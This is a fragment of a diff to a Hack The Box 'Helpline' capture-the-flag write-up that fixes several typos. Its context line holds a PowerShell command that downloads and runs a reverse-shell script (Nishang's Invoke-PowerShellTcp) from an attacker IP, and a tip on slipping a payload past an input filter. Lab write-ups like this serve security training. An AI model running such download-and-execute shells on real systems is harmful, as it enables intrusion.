Kyuu-Ji/htb-write-up/helpline/write-up-helpline.md

 Action Type: Execute Script: cmd /c powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.13.230/shell.ps1')
 ```

-_Shell.ps1_ is just the standard reverse shell from Nishand called _Invoke-PowerShellTcp.ps1_.
+_Shell.ps1_ is just the standard reverse shell from Nishang called _Invoke-PowerShellTcp.ps1_.
-It is important that there is only one trugger or else it won't work well.
+It is important that there is only one trigger or else it won't work well.

 Optional:
-> We can minimize the types of characters we are sending, to not get into a input filter:
+> We can minimize the types of characters we are sending, to not get blocked by an input filter:

 ```markdown
 Base64 decode command: